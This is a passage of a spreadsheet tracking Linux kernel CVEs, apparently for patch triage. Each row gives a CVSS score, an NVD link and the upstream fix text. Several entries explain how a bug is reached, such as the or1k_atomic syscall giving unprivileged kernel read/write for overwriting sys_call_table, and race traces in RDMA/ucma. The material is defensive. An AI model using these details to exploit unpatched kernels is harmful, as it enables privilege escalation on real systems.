      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
openvswitch: Fix CT limit teardown use-after-free
Packet processing uses CT limit state under RCU, while netns teardown
frees that state under ovs_mutex. The CT limit pointer was neither removed
from readers nor protected by a grace period, allowing packet processing to
dereference the freed state.
An unprivileged user can trigger this bug from a user and network
namespace, causing a slab-use-after-free in ovs_ct_execute() when the
netns is torn down.
Publish the CT limit pointer through RCU, remove it before teardown, and
wait for readers before freeing its contents. Keep ovs_mutex around
individual CT limit updates, and use the RCU read-side lock while GET
traverses the RCU-protected limit lists.
Netns teardown detaches the RCU-protected CT limit state in the pernet
.pre_exit callback while holding ovs_mutex.  The pernet core guarantees an
RCU grace period between the .pre_exit and .exit callbacks, so the .exit
callback completes the teardown without adding any extra synchronization.
The netlink command handlers do not need NULL checks because the userspace
netlink socket holds an active reference to its network namespace while a
request is processed. The per-netns exit path therefore cannot run
concurrently with SET, DEL, or GET for that socket's namespace.</t>
        </is>
      </c>
      <c r="S357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89488</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89489</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr"/>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
openrisc: fix arbitrary kernel memory access via or1k_atomic syscall
sys_or1k_atomic() (syscall 244 in the "or1k" ABI) takes two user
pointers, v1 and v2, and swaps the words they point to in hand-written
assembly.
    l.lwz   r29,0(r4)
    l.lwz   r27,0(r5)
    l.sw    0(r4),r27
    l.sw    0(r5),r29
The pointers are not checked with access_ok(). The four memory
accesses also have no exception table entries.
A caller passes a kernel address as either pointer, and the syscall
reads from and writes to it directly.
This gives an unprivileged process a kernel read/write primitive. It
overwrites kernel data such as the sys_call_table, gaining code
execution in kernel context.
Check both pointers before entering the critical section. Add fixups
for the four memory accesses so faults on valid but unmapped user
addresses return -EFAULT.
[shorne@gmail.com: fix comment style]</t>
        </is>
      </c>
      <c r="S358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89489</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89497</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr"/>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
orangefs: skip leading spaces before parsing client debug masks
orangefs_prepare_cdm_array() sizes each client debug keyword buffer
with strcspn(cds_head, " "), but then parses the keyword with %s. The
%s conversion skips leading whitespace, while strcspn() does not.
If a client debug entry starts with a space, the allocation can be sized
for an empty keyword while sscanf() copies the following non-empty token.
This can write past the end of the allocated keyword buffer.
Skip leading spaces before computing the keyword length so the allocation
matches the string parsed by sscanf().</t>
        </is>
      </c>
      <c r="S359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89497</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89499</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr"/>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Stop remote reader update when page swap fails
The remote swap_reader_page callback can return -EBUSY when the writer
moves the head before the remote catches it, particularly during an event
storm on a small buffer. __rb_get_reader_page_from_remote() currently
warns about that failure but continues with the unchanged reader ID and
rearranges the local page list as though the swap succeeded.
Handle the callback failure as a recoverable error. Report it with
pr_warn_ratelimited() and return NULL. Callers already handle a NULL reader
page as a failed attempt. This avoids splicing the same page as both the
previous and new reader without flooding the log under contention.</t>
        </is>
      </c>
      <c r="S360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89499</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89500</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr"/>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Make cpu_buffer::free_page a buffer_data_read_page
Discarding a cached reader page after a concurrent ring buffer resize
uses the new global subbuf_order for the free_pages() call. This
mismatched order may crashes the kernel or leaks memory because the cached
page was allocated under the old size.
Save the actual free_page order alongside the page address to ensure we
always refer to the correct value and do not rely on the potentially
stalled cpu_buffer-&gt;subbuf_order value. The simplest is to make
free_page a buffer_data_read_page which already covers exactly what we
need: a page address and a page order.</t>
        </is>
      </c>
      <c r="S361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89500</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89501</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr"/>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Hold cpu_buffer::lock when resizing a subbuf
Because, ring_buffer_subbuf_order_set() can clear cpu_buffer-&gt;free_page,
hold cpu_buffer-&gt;lock to prevent races with
ring_buffer_alloc_read_page() and ring_buffer_free_read_page().</t>
        </is>
      </c>
      <c r="S362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89501</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89503</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr"/>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Fix subbuf resize race with ring_buffer_alloc_read_page()
ring_buffer_alloc_read_page() is racy with ring_buffer_subbuf_order_set,
it can allocate a reader page with an outdated order. This isn't a big
issue, the user can still re-allocate a new reader page and try again.
However, what is more problematic is if the value of subbuf_order
changes in the middle of ring_buffer_alloc_read_page(). In that case,
bpage-&gt;order might not match the actual allocated memory.
Use bpage-&gt;order for the allocation to prevent this race.</t>
        </is>
      </c>
      <c r="S363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89503</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89507</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr"/>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/ucma: Lock the handler in ucma_write_cm_event()
ctx-&gt;file may only be changed under the handler lock and the xa_lock, which
is what stops uevents being queued for a ctx while ucma_migrate_id() moves
it to another file.  The CM core takes that lock before invoking
ucma_event_handler(), but the write() paths that queue uevents themselves
do not.
ucma_write_cm_event() re-reads ctx-&gt;file for each of its four dereferences,
so ucma_migrate_id() can swap it mid-sequence:
	mutex_lock(&amp;ctx-&gt;file-&gt;mut);			/* file A */
	list_add_tail(&amp;uevent-&gt;list, &amp;ctx-&gt;file-&gt;event_list);	/* file B */
	mutex_unlock(&amp;ctx-&gt;file-&gt;mut);			/* file B */
	wake_up_interruptible(&amp;ctx-&gt;file-&gt;poll_wait);	/* file B */
The window is the mutex_lock() itself: the writer sleeps in it while the
migration reassigns ctx-&gt;file.  The list_add_tail() then runs on file B's
event_list holding only file A's mutex:
  list_add corruption. prev-&gt;next should be next (ffff888101320f30),
    but was ffff88814a08c418. (prev=ffff88814a075c18).
  kernel BUG at lib/list_debug.c:32!
  Call Trace:
   ucma_write_cm_event+0x36e/0x5e0
and file A's mut is left held forever, wedging its next writer in D state.
The uevent is also stranded on a list ucma_cleanup_ctx_events() will not
walk, so it outlives its context.  /dev/infiniband/rdma_cm is 0666 and no
RDMA device is involved, so an unprivileged user reaches all of this.
Take the handler lock, as ucma_cleanup_mc_events() does; ctx-&gt;cm_id is
pinned by the ucma_get_ctx() reference.</t>
        </is>
      </c>
      <c r="S364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89507</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89508</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr"/>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/ucma: Lock the handler in ucma_set_ib_path()
ucma_set_ib_path() calls ucma_event_handler() straight from the write()
path, without the handler lock that keeps ctx-&gt;file stable while a uevent
is queued.  The handler re-reads ctx-&gt;file for every dereference:
	mutex_lock(&amp;ctx-&gt;file-&gt;mut);			/* file A */
	list_add_tail(&amp;uevent-&gt;list, &amp;ctx-&gt;file-&gt;event_list);	/* file B */
	mutex_unlock(&amp;ctx-&gt;file-&gt;mut);			/* file B */
	wake_up_interruptible(&amp;ctx-&gt;file-&gt;poll_wait);	/* file B */
A concurrent ucma_migrate_id() reassigns ctx-&gt;file while the SET_OPTION
caller sleeps in mutex_lock(), so the list_add_tail() lands on file B's
event_list while only file A's mutex is held, racing every other user of
that list:
  BUG: KASAN: slab-use-after-free in __list_add_valid_or_report+0x1aa/0x1c0
  Read of size 8 at addr ffff888153c6a418 by task poc_corr/486
  Call Trace:
   __list_add_valid_or_report+0x1aa/0x1c0
   ucma_event_handler+0x1be/0xc00
   ucma_set_ib_path+0x45e/0x710
   ucma_set_option+0x32e/0x590
   ucma_write+0x1f9/0x330
  Allocated by task 505:
   ucma_write_cm_event+0x1a1/0x660
  Freed by task 505:
   kfree+0x1da/0x4c0
   ucma_get_event+0x5d5/0x7e0
The freed object is a ucma_event that another thread dequeued from file B's
list under file B's mutex.  File A's mut is left held on top of that,
wedging its next writer in uninterruptible sleep.
This path needs a bound and address-resolved cm_id, so it requires an RDMA
device to be present.
Take the handler lock around the call.</t>
        </is>
      </c>
      <c r="S365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89508</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89510</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr"/>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cxgb4: Cancel reg_work before freeing device on remove
c4iw_uld_state_change() queues reg_work to register the RDMA device.
c4iw_remove() can free ctx-&gt;dev while this work is pending or running,
leaving c4iw_register_device() accessing the freed device.
Cancel reg_work before removing the device.  The registration work can
tear down ctx-&gt;dev when registration fails, so do not unregister or
deallocate it again in that case.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89510</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89520</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr"/>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/core: Make core-sched flips wait for in-flight selections
Core scheduling's pick_next_task() operates on all sibling rqs under one
acquisition of the shared core-wide lock. A -&gt;pick_task() that releases the
rq lock leaves every sibling __lock momentarily free, letting
__sched_core_flip(false) complete mid-selection and rebind rq_lockp() under
it. The selection resumes on the split locks, touching sibling state it no
longer protects, and __schedule() finally releases a lock that was never
taken while leaking the one that was.
Count in-flight core-wide selections in the leader's rq-&gt;core_pick_in_flight
and make __sched_core_flip() wait for the count to drain. The count only
changes under the shared lock, which the flip holds while sampling, so no
other ordering is needed. The wait can repeat while selections overlap, but
the flip backs off between samples and flips are rare cookie-lifetime
events.
sched_core_cpu_deactivate() moves the count to the new leader - a stale copy
left behind would bias it forever if that CPU later returns as its own
leader.</t>
        </is>
      </c>
      <c r="S367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89520</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89522</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr"/>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: staging/ipu7: fix async notifier UAF on probe error path
isys_register_devices() registers the V4L2 async notifier via
isys_notifier_init(). If a subsequent probe step such as
isys_fw_log_init() fails, isys_probe() jumps to the out_cleanup label
which only calls isys_unregister_devices(). That helper tears down the
video devices, subdevices, V4L2 device and media device, but never
unregisters or cleans up the async notifier.
As a result the notifier stays chained in the global notifier_list while
the enclosing struct ipu7_isys is freed by devres, leading to list
corruption and a use-after-free the next time the list is walked.
The remove path already does the right thing by calling
isys_notifier_cleanup() before isys_unregister_devices(). Mirror that on
the probe error path so the notifier is unregistered and cleaned up
before the device is torn down.</t>
        </is>
      </c>
      <c r="S368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89522</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89523</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr"/>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7925: cancel pending mlo_pm_work
If the device is reset, suspended or unregistered within that window,
the pending work can still run and access vif/bss data that may already
be freed, or send MCU commands while the firmware is not available.
Add cancel_delayed_work_sync(&amp;dev-&gt;mlo_pm_work) in all relevant teardown
and suspend paths:
 - mt7925_mac_reset_work()        (chip reset recovery)
 - mt7925e_unregister_device()    (PCIe unbind)
 - mt7925_pci_suspend()           (PCIe bus suspend)
 - mt7925_suspend()               (mac80211 suspend)
 - mt7925u_suspend()              (USB bus / runtime suspend)
This ensures the work is stopped before the device state becomes
invalid.</t>
        </is>
      </c>
      <c r="S369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89523</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89540</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr"/>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunrpc: init gssp_lock before publishing proc entry
create_use_gss_proxy_proc_entry() publishes /proc/net/rpc/use-gss-proxy
via proc_create_data() before init_gssp_clnt() runs mutex_init() on
sn-&gt;gssp_lock.  Once the dentry is linked under proc_subdir_lock it is
immediately reachable from userspace, so a write that lands in the
window drives set_gssp_clnt() into mutex_lock() on a zero-initialized
struct mutex.
    create_use_gss_proxy_proc_entry(net)
      proc_create_data("use-gss-proxy", ...)   /* dentry live */
      init_gssp_clnt(sn)
        mutex_init(&amp;sn-&gt;gssp_lock)             /* too late */
    write_gssp()
      set_gssp_clnt(net)
        mutex_lock(&amp;sn-&gt;gssp_lock)             /* uninitialized */
        gssp_rpc_create(...)
        sn-&gt;gssp_clnt = clnt
        mutex_unlock(&amp;sn-&gt;gssp_lock)
The window spans only the two statements between proc_create_data()
returning and init_gssp_clnt(), so a writer reaches it only if the
registering thread is preempted there while another task is already
opening the freshly published file.  register_pernet_subsys() runs in
preemptible context under pernet_ops_rwsem, so that preemption is
possible, and the window widens on auth_rpcgss module load, when the
proc entry is created for every live net namespace whose tasks are
already running.  A writer that wins the race locks a zero-filled
